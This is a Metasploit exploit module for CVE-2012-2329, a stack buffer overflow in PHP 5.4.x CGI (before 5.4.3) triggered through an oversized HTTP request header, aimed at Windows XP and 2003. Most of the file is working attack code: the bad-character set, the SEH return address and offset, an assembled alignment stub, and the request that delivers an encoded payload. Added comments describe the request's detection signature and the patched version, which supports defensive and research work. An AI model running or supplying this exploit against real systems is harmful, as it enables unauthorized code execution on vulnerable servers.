PHP apache_request_headers Function Buffer Overflow



  1. ##
  2. # This file is part of the Metasploit Framework and may be subject to
  3. # redistribution and commercial restrictions. Please see the Metasploit
  4. # web site for more information on licensing and terms of use.
  5. # http://metasploit.com/
  6. ##
  7. require 'msf/core'
# Metasploit module for CVE-2012-2329: a stack-based buffer overflow in the CGI
# version of PHP 5.4.x before 5.4.3, reached through HTTP request headers
# (apache_request_headers); the single target is Windows with an SEH overwrite.
#
# Defender notes, taken from what this module actually sends: one GET to
# TARGETURI carrying a single extra header named "HTTP_X_" plus four random
# lowercase letters, whose value is padded to 4096 bytes; an HTTP 500 reply is
# treated by the module as a possible exploitation signal. Upgrading to PHP
# 5.4.3 or later (see the ChangeLog reference below) removes the vulnerability.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Seh

  # Declares module metadata (name, description, references, payload
  # constraints, target) and registers the TARGETURI option.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PHP apache_request_headers Function Buffer Overflow',
      'Description'    => %q{
This module exploits a stack based buffer overflow in the CGI version of PHP
5.4.x before 5.4.3. The vulnerability is due to the insecure handling of the
HTTP headers.
This module has been tested against the thread safe version of PHP 5.4.2,
from "windows.php.net", running with Apache 2.2.22 from "apachelounge.com".
},
      'Author'         =>
        [
          'Vincent Danen', # Vulnerability discovery
          'juan vazquez', # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'CVE', '2012-2329'],
          [ 'OSVDB', '82215'],
          [ 'BID', '53455'],
          [ 'URL', 'http://www.php.net/archive/2012.php#id2012-05-08-1' ],
          [ 'URL', 'http://www.php.net/ChangeLog-5.php#5.4.3'],
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=820000' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'          => 1321,
          'DisableNops'    => true,
          # Bytes that must not appear in the header value: NUL, CR, LF, '_' (0x5f),
          # a few high bytes, plus the ranges 'A'..'Z' (0x41..0x5a), 0x82..0x8c
          # and 0x91..0x9c.
          'BadChars'       => "\x00\x0d\x0a\x5f\x80\x8e\x9e\x9f" + (0x41..0x5a).to_a.pack("C*") + (0x82..0x8c).to_a.pack("C*") + (0x91..0x9c).to_a.pack("C*"),
          # Encoder type matching the BadChars set above (no upper case, underscore safe).
          'EncoderType'    => Msf::Encoder::Type::NonUpperUnderscoreSafe,
          'EncoderOptions' =>
            {
              'BufferOffset' => 0x0
            }
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows XP SP3 / Windows 2003 Server SP2 (No DEP) / PHP 5.4.2 Thread safe',
            {
              'Ret'    => 0x1002aa79, # ppr from php5ts.dll
              # Bytes from the start of the header value to the SEH record (see #exploit).
              'Offset' => 1332
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 08 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI path to the php using apache_request_headers', '/php/test.php']),
      ], self.class)
  end

  # Builds the overlong header value, sends it in one GET request and then
  # hands control to the payload handler.
  #
  # Layout of the header value, in order: ECX-alignment stub, encoded payload,
  # random padding up to target['Offset'], SEH record (generate_seh_record),
  # a 5-byte "call" back into the buffer, then random padding to 4096 bytes.
  # The padding lengths depend on sploit.length at each step, so statement
  # order matters.
  #
  # @return [void]
  def exploit
    print_status("Trying target #{target.name}...")

    # Make ECX point to the start of the encoded payload
    align_ecx = "pop esi\n" # "\x5e"
    esi_alignment = target['Offset'] + # Space from the start of align_ecx to nseh handler
      8 + # len(nseh + seh)
      5 - # len(call back)
      11 # len(align_ecx)
    align_ecx << "add esi, -#{esi_alignment}\n" # "\x81\xC6" + 4 bytes imm (ex: "\xCA\xFA\xFF\xFF")
    align_ecx << "sub ecx, ecx\n" # "\x29\xC9"
    align_ecx << "add ecx, esi" # "\x01\xf1"
    sploit = Metasm::Shellcode.assemble(Metasm::Ia32.new, align_ecx).encode_string

    # Encoded payload
    sploit << payload.encoded

    # Padding if needed (brings the buffer up to exactly target['Offset'] bytes)
    sploit << rand_text(target['Offset']-sploit.length)

    # SEH handler overwrite
    sploit << generate_seh_record(target.ret)

    # Call back "\xE8" + 4 bytes imm (ex: "\xBF\xFA\xFF\xFF")
    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-#{target['Offset']+8}").encode_string

    # Make it crash (pads the header value to 4096 bytes in total)
    sploit << rand_text(4096 - sploit.length)

    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")

    # Detection note: a single GET with one custom header named "HTTP_X_" plus
    # four random lowercase letters, carrying a 4096-byte, mostly random value.
    res = send_request_cgi({
      'uri' => target_uri.to_s,
      'method' => 'GET',
      'headers' =>
        {
          "HTTP_X_#{rand_text_alpha_lower(4)}" => sploit,
        }
    })

    # A 500 is only a hint; success is established by the handler below
    # receiving a session. NOTE(review): `and` is used for boolean logic here;
    # `&&` is the conventional form.
    if res and res.code == 500
      print_status "We got a 500 error code. Even without a session it could be an exploitation signal!"
    end

    handler
  end
end
